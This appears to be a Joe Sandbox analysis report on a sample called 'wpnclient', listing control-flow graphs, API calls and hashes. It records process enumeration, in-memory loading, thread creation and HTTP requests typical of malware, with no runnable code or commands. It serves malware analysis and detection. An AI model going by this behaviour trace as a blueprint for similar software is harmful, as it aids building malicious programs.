                                                                                      control_flow_graph 511 21e86f0-21e8806 512 21e8810-21e8816 511->512 513 21e881c 512->513 514 21e8950-21e8956 512->514 515 21e891b-21e8922 513->515 516 21e8822-21e8828 513->516 517 21e8958-21e895e 514->517 518 21e89a0-21e89e8 call 21ebaa0 514->518 524 21e893f-21e894b 515->524 525 21e8924-21e893a call 21e4190 call 21e40f0 515->525 519 21e882e-21e8834 516->519 520 21e88c3-21e88cb 516->520 522 21e88ac-21e88b2 517->522 523 21e8964-21e896b 517->523 530 21e88b8-21e88c2 518->530 539 21e89ee 518->539 527 21e8836-21e883c 519->527 528 21e8845-21e884c 519->528 531 21e88cd-21e88e5 call 21e4190 call 21e40f0 520->531 532 21e88eb-21e890f CreateFileW 520->532 522->512 522->530 533 21e896d-21e8983 call 21e4190 call 21e40f0 523->533 534 21e8988-21e899b 523->534 524->512 525->524 527->522 536 21e883e-21e8843 527->536 537 21e884e-21e8864 call 21e4190 call 21e40f0 528->537 538 21e8869-21e888c 528->538 531->532 532->530 543 21e8911-21e8916 532->543 533->534 534->512 536->512 537->538 558 21e888e-21e88a4 call 21e4190 call 21e40f0 538->558 559 21e88a9 538->559 547 21e89f8-21e8a05 539->547 548 21e89f0-21e89f2 539->548 543->512 548->530 548->547 558->559 559->522
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000), ref: 021E8908
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID: [i$V^!$x*
                                                                                      • API String ID: 823142352-1411442858
                                                                                      • Opcode ID: 88bf14bc94d42dacc36249e872f8427ec2296cbcc04be38c06c7cb86d955681c
                                                                                      • Instruction ID: 1aaa3635ebd61752b063fc9a59f9f0b95db7de1741a37462da24861d10dd12f0
                                                                                      • Opcode Fuzzy Hash: 88bf14bc94d42dacc36249e872f8427ec2296cbcc04be38c06c7cb86d955681c
                                                                                      • Instruction Fuzzy Hash: 8E71A471A487019FDB18DF68DC44A2FBBE5ABC4314F058D2DE8AA9B290D774D944CF82

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 831 21e5720-21e572e 832 21e5730-21e5735 831->832 833 21e5737 832->833 834 21e57a5-21e57aa 832->834 837 21e573d-21e5742 833->837 838 21e5832-21e5840 833->838 835 21e57ac-21e57b1 834->835 836 21e5818-21e582d 834->836 839 21e5804-21e5813 835->839 840 21e57b3-21e57b8 835->840 836->832 841 21e579e-21e57a3 837->841 842 21e5744-21e5749 837->842 839->832 843 21e57ef-21e57f4 840->843 844 21e57ba-21e57c1 840->844 841->832 845 21e574b-21e5750 842->845 846 21e5790-21e579c 842->846 843->832 848 21e57fa-21e5803 843->848 849 21e57de-21e57ea GetNativeSystemInfo 844->849 850 21e57c3-21e57d9 call 21e4190 call 21e40f0 844->850 845->843 847 21e5756-21e5765 845->847 846->832 852 21e5767-21e577d call 21e4190 call 21e40f0 847->852 853 21e5782-21e578e 847->853 849->832 850->849 852->853 853->832
                                                                                      APIs
                                                                                      • GetNativeSystemInfo.KERNELBASE(38CFF007,38CFF007), ref: 021E57E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoNativeSystem
                                                                                      • String ID: 7y30$7y30
                                                                                      • API String ID: 1721193555-1385743603
                                                                                      • Opcode ID: 901c4e2774ad2de89eebee943ac28b4b297a53b1372f60b4c49624a0dadea799
                                                                                      • Instruction ID: f72c64ef01277fca95c0d76f27d20ef1f873cf94c7c11940ea10149b08cfb449
                                                                                      • Opcode Fuzzy Hash: 901c4e2774ad2de89eebee943ac28b4b297a53b1372f60b4c49624a0dadea799
                                                                                      • Instruction Fuzzy Hash: 8A213A79ED0600EBDE3896289C9366B76C7978435CFC5092AE49BCB251E734C9618BC3

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 970 21e4fd0-21e4fe6 971 21e4ff0-21e4ff5 970->971 972 21e4ffb 971->972 973 21e50a9-21e50ae 971->973 974 21e509f-21e50a4 972->974 975 21e5001-21e5006 972->975 976 21e50cc-21e50d3 973->976 977 21e50b0-21e50b5 973->977 974->971 978 21e5008-21e500d 975->978 979 21e5084-21e509a 975->979 982 21e50d5-21e50eb call 21e4190 call 21e40f0 976->982 983 21e50f0-21e50fb CreateToolhelp32Snapshot 976->983 980 21e5107-21e510e 977->980 981 21e50b7-21e50bc 977->981 988 21e500f-21e5014 978->988 989 21e5056-21e5065 978->989 979->971 986 21e512b-21e512c CloseHandle 980->986 987 21e5110-21e5126 call 21e4190 call 21e40f0 980->987 981->971 990 21e50c2-21e50cb 981->990 982->983 984 21e512e-21e5137 983->984 985 21e50fd-21e5102 983->985 985->971 986->984 987->986 988->981 997 21e501a-21e5021 988->997 992 21e503e-21e5054 Process32FirstW 989->992 993 21e5067-21e5082 call 21e4190 call 21e40f0 989->993 992->971 993->992 997->992 1001 21e5023-21e5039 call 21e4190 call 21e40f0 997->1001 1001->992
                                                                                      APIs
                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 021E5044
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 021E50F4
                                                                                      • CloseHandle.KERNELBASE(?,?,?,?), ref: 021E512C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 1083639309-0
                                                                                      • Opcode ID: cb5e00c6f7bbef7bd2a3b599f835e0112fe91b55ca9ef2d861faad0fee79165b
                                                                                      • Instruction ID: 106e88690a087f98b99556c3929e02663ebba4f5634e0e0c44d1f0faa4c31868
                                                                                      • Opcode Fuzzy Hash: cb5e00c6f7bbef7bd2a3b599f835e0112fe91b55ca9ef2d861faad0fee79165b
                                                                                      • Instruction Fuzzy Hash: 0731E975BC09016F9E2866BCBC5473F17C69B90618B98093AF523CF345E768C9858BD2

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 51 401019-4012fe 53 4014d1-4014db 51->53 54 401304-40131a 51->54 55 401320-4014b2 call 401560 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z * 2 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z * 2 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z 54->55 58 4014b8-4014d0 55->58
                                                                                      APIs
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4,00000343,00582508), ref: 00401398
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040139B
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013AC
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013AF
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013C1
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013C4
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,6EA4A3D8,004059A4), ref: 004013D9
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013EA
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013F0
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401402
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401405
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,6EA4A3D8,004059A4), ref: 0040141A
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 0040142B
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040142E
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401440
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401443
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401455
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401458
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 0040146C
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040146F
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401481
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401484
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541432357.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2541409691.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541456929.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: U?$char_traits@V?$basic_ostream@$?endl@std@@D@std@@@1@V21@@$??6std@@D@std@@@0@V10@
                                                                                      • String ID:
                                                                                      • API String ID: 2803004057-0
                                                                                      • Opcode ID: 4e668faee3baf0bf314fe0a6ed89ed04cc46d060bfd11fc77c33a5f615d1b13b
                                                                                      • Instruction ID: e5c193a8be6e18b913c016f231c9b957fb8706e5e71893854bd9b99652add971
                                                                                      • Opcode Fuzzy Hash: 4e668faee3baf0bf314fe0a6ed89ed04cc46d060bfd11fc77c33a5f615d1b13b
                                                                                      • Instruction Fuzzy Hash: 0E51F3796053919FC700EB74DD8882B7FA9EF88314F0548EDF845A73D1C6799418CBAA

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 59 21e2ca0-21e2cd4 60 21e2cd8-21e2cdc 59->60 61 21e2ce0-21e2ce6 60->61 62 21e2cec 61->62 63 21e2f34-21e2f3a 61->63 64 21e2cf2-21e2cf8 62->64 65 21e2f03-21e2f0a 62->65 66 21e308e-21e3094 63->66 67 21e2f40 63->67 70 21e2cfe 64->70 71 21e2dda-21e2de0 64->71 72 21e2f0c-21e2f22 call 21e4190 call 21e40f0 65->72 73 21e2f27-21e2f2f 65->73 68 21e30f8-21e30ff 66->68 69 21e3096-21e309c 66->69 74 21e2f87-21e2f96 67->74 75 21e2f42-21e2f48 67->75 85 21e311c-21e3124 InternetCloseHandle 68->85 86 21e3101-21e3117 call 21e4190 call 21e40f0 68->86 76 21e2d62-21e2d68 69->76 77 21e30a2-21e30a4 69->77 78 21e3129-21e3130 70->78 79 21e2d04-21e2d0a 70->79 83 21e2e44-21e2e46 71->83 84 21e2de2-21e2de8 71->84 72->73 73->61 81 21e2f98-21e2fae call 21e4190 call 21e40f0 74->81 82 21e2fb3-21e2fbe 74->82 87 21e2f7d-21e2f82 75->87 88 21e2f4a-21e2f50 75->88 76->61 102 21e2d6e-21e2d79 76->102 93 21e30ae-21e30b0 77->93 94 21e30a6-21e30ac 77->94 89 21e314d-21e315e 78->89 90 21e3132-21e3148 call 21e4190 call 21e40f0 78->90 95 21e2d0c-21e2d12 79->95 96 21e2d7a-21e2d89 79->96 81->82 123 21e2fdb-21e2fe9 82->123 124 21e2fc0-21e2fd6 call 21e4190 call 21e40f0 82->124 98 21e2e5a 83->98 99 21e2e48-21e2e58 call 21e35f0 83->99 84->76 92 21e2dee-21e2df5 84->92 85->61 86->85 87->61 88->76 103 21e2f56-21e2f6f call 21e2a40 88->103 90->89 109 21e2df7-21e2e0d call 21e4190 call 21e40f0 92->109 110 21e2e12-21e2e3f InternetConnectW 92->110 111 21e30b2-21e30b9 93->111 94->111 95->76 112 21e2d14-21e2d1b 95->112 104 21e2d8b-21e2da1 call 21e4190 call 21e40f0 96->104 105 21e2da6-21e2dbc 96->105 115 21e2e5e-21e2e65 98->115 99->115 136 21e2f73-21e2f78 103->136 104->105 105->136 150 21e2dc2-21e2dca 105->150 109->110 110->61 126 21e30bb-21e30d1 call 21e4190 call 21e40f0 111->126 127 21e30d6-21e30f3 HttpSendRequestW 111->127 128 21e2d1d-21e2d33 call 21e4190 call 21e40f0 112->128 129 21e2d38-21e2d5d InternetOpenW call 21e4570 112->129 132 21e2e67-21e2e7d call 21e4190 call 21e40f0 115->132 133 21e2e82-21e2ea0 115->133 163 21e2fef-21e2ff6 123->163 164 21e3084-21e3089 123->164 124->123 126->127 127->60 128->129 129->76 132->133 157 21e2ebd-21e2ec8 133->157 158 21e2ea2-21e2eb8 call 21e4190 call 21e40f0 133->158 136->61 150->136 160 21e2dd0-21e2dd5 150->160 181 21e2eca-21e2ee0 call 21e4190 call 21e40f0 157->181 182 21e2ee5-21e2efe 157->182 158->157 160->61 170 21e2ff8-21e300e call 21e4190 call 21e40f0 163->170 171 21e3013-21e301f ObtainUserAgentString 163->171 164->60 170->171 178 21e3032-21e3039 171->178 179 21e3021-21e302e call 21e5a60 171->179 185 21e303b-21e3051 call 21e4190 call 21e40f0 178->185 186 21e3056-21e3061 178->186 179->178 181->182 182->61 185->186 198 21e307e-21e3081 186->198 199 21e3063-21e3079 call 21e4190 call 21e40f0 186->199 198->164 199->198
                                                                                      APIs
                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 021E2D44
                                                                                      • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 021E2E28
                                                                                      • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 021E301B
                                                                                      • HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 021E30DF
                                                                                      • InternetCloseHandle.WININET(?), ref: 021E311D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                                                                      • String ID: Y~?i$Y~?i$Y~?i$p^sw$12$12$12
                                                                                      • API String ID: 1741791824-70384390
                                                                                      • Opcode ID: 221c78706eb2cb9f590fbee042aaea8fa84bf4d2d1f6f37ff77856a1f21f5638
                                                                                      • Instruction ID: 3966837d28a7fbee7a65c4be0536df071be72ff3adcf9a07a7812ad4a3a9f1a3
                                                                                      • Opcode Fuzzy Hash: 221c78706eb2cb9f590fbee042aaea8fa84bf4d2d1f6f37ff77856a1f21f5638
                                                                                      • Instruction Fuzzy Hash: 30B1B231F847019FDF24ABB8AC5476B76DAAB94650F04092DED57DB380EB71DD408B82

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 021E5FDB
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 021E604A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateFree
                                                                                      • String ID: p^sw$12$12
                                                                                      • API String ID: 2488874121-2300862904
                                                                                      • Opcode ID: ce418e97d8ccc362fb693106042aa32ff88d61af82ace8ab0afee4eb1d6eb3c8
                                                                                      • Instruction ID: e6ebb5d792f3dd29e991d6caa6f3db5bcaa6833111e69694530fd4a04fac6d02
                                                                                      • Opcode Fuzzy Hash: ce418e97d8ccc362fb693106042aa32ff88d61af82ace8ab0afee4eb1d6eb3c8
                                                                                      • Instruction Fuzzy Hash: E5119070BC46119FCF20AAB97C50B6B6ADBAFD5250B00483DE506DF381EB65DC614BD1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 566 21e31f0-21e3206 567 21e320a-21e320f 566->567 568 21e3210-21e3215 567->568 569 21e333d-21e3342 568->569 570 21e321b 568->570 573 21e337d-21e3384 569->573 574 21e3344-21e3349 569->574 571 21e321d-21e3222 570->571 572 21e3294-21e3338 570->572 575 21e325a-21e3262 571->575 576 21e3224-21e3229 571->576 572->567 579 21e3386-21e339c call 21e4190 call 21e40f0 573->579 580 21e33a1-21e33ac 573->580 577 21e334b-21e3350 574->577 578 21e3369-21e336d 574->578 587 21e3264-21e327c call 21e4190 call 21e40f0 575->587 588 21e3282-21e328f 575->588 581 21e324a-21e3258 call 21e3ee0 576->581 582 21e322b-21e3230 576->582 583 21e3236-21e323b 577->583 584 21e3356-21e3364 577->584 585 21e342b-21e3435 578->585 586 21e3373-21e3378 578->586 579->580 597 21e33ae-21e33c4 call 21e4190 call 21e40f0 580->597 598 21e33c9-21e33d7 RtlAllocateHeap 580->598 581->567 582->583 591 21e33e3-21e33eb 582->591 583->568 592 21e323d-21e3247 583->592 584->568 586->568 587->588 588->567 600 21e33ed-21e3405 call 21e4190 call 21e40f0 591->600 601 21e340b-21e3429 591->601 597->598 598->585 605 21e33d9-21e33de 598->605 600->601 601->585 605->567
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,0000021C), ref: 021E33D1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID: V<j[$p^sw$12
                                                                                      • API String ID: 1279760036-1938916030
                                                                                      • Opcode ID: 5f6cb0a7dcd273cbdaff1b0331bd4862022ecc19c79a73aa0c4dfc090dc7bca6
                                                                                      • Instruction ID: c3d21e775791ee9b632d739d8adf4f3668a19fd259a1dee3fa96e19a764e7d1d
                                                                                      • Opcode Fuzzy Hash: 5f6cb0a7dcd273cbdaff1b0331bd4862022ecc19c79a73aa0c4dfc090dc7bca6
                                                                                      • Instruction Fuzzy Hash: 4D51C471A847028FCF18DE68988452BBBE6EBD4350F104D6EE463CB391DB71D949CB92

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 793 21ea230-21ea23c 794 21ea240-21ea245 793->794 795 21ea2a7-21ea2ae 794->795 796 21ea247-21ea24c 794->796 799 21ea2cb-21ea2d6 795->799 800 21ea2b0-21ea2c6 call 21e4190 call 21e40f0 795->800 797 21ea252-21ea257 796->797 798 21ea310-21ea317 796->798 804 21ea259-21ea260 797->804 805 21ea297-21ea29c 797->805 802 21ea319-21ea32f call 21e4190 call 21e40f0 798->802 803 21ea334-21ea34b CreateThread 798->803 816 21ea2d8-21ea2ee call 21e4190 call 21e40f0 799->816 817 21ea2f3-21ea304 799->817 800->799 802->803 811 21ea34d-21ea355 803->811 808 21ea27d-21ea295 804->808 809 21ea262-21ea278 call 21e4190 call 21e40f0 804->809 805->794 812 21ea29e-21ea2a6 805->812 808->794 809->808 816->817 817->811 829 21ea306-21ea30b 817->829 829->794
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,021E9EA0,00000000,00000000,00000000), ref: 021EA343
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID: p^sw$12
                                                                                      • API String ID: 2422867632-1302981717
                                                                                      • Opcode ID: 386bcb630f2881000b3a376ca34e54b9575030ec6668807a4b3a35c58b6a636a
                                                                                      • Instruction ID: 62aedb79f2d84ed00f74fb9ddb5b1a8e2bdb999a9a4dc28ddf64ac18b233511f
                                                                                      • Opcode Fuzzy Hash: 386bcb630f2881000b3a376ca34e54b9575030ec6668807a4b3a35c58b6a636a
                                                                                      • Instruction Fuzzy Hash: BA21A674BC46018FDF14ABB86D51B6F26D6AF41650F204C39E907DF3C0DBA6D8908B82

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 862 59002d-59009e call 590456 * 6 875 5900a0-5900a2 862->875 876 5900a7-5900b0 862->876 878 59044e-590455 875->878 876->875 877 5900b2-5900b6 876->877 877->875 879 5900b8-5900c2 877->879 880 5900e4-590105 GetNativeSystemInfo 879->880 881 5900c4-5900c7 879->881 880->875 883 590107-59012d VirtualAlloc 880->883 882 5900c9-5900cf 881->882 884 5900d1-5900d4 882->884 885 5900d6 882->885 886 59012f-590133 883->886 887 590162-59016c 883->887 890 5900d9-5900e2 884->890 885->890 891 590135-590138 886->891 888 59016e-590173 887->888 889 5901a4-5901b5 887->889 892 590177-59018a 888->892 893 590234-590240 889->893 894 5901b7-5901d1 889->894 890->880 890->882 895 59013a-590142 891->895 896 590153-590155 891->896 898 590199-59019e 892->898 899 59018c-590193 892->899 900 5902f0-5902fa 893->900 901 590246-59025d 893->901 915 5901d3 894->915 916 590222-59022e 894->916 895->896 902 590144-590147 895->902 897 590157-59015c 896->897 897->891 903 59015e 897->903 898->892 907 5901a0 898->907 899->899 904 590195 899->904 905 590300-590307 900->905 906 5903b2-5903c7 call 21827b0 900->906 901->900 908 590263-590273 901->908 910 590149-59014c 902->910 911 59014e-590151 902->911 903->887 904->898 912 590309-590312 905->912 931 5903c9-5903ce 906->931 907->889 913 5902d5-5902e6 908->913 914 590275-590279 908->914 910->896 910->911 911->897 919 590318-590333 912->919 920 5903a7-5903ac 912->920 913->908 917 5902ec 913->917 921 59027a-590289 914->921 922 5901d7-5901db 915->922 916->894 918 590230 916->918 917->900 918->893 924 59034d-59034f 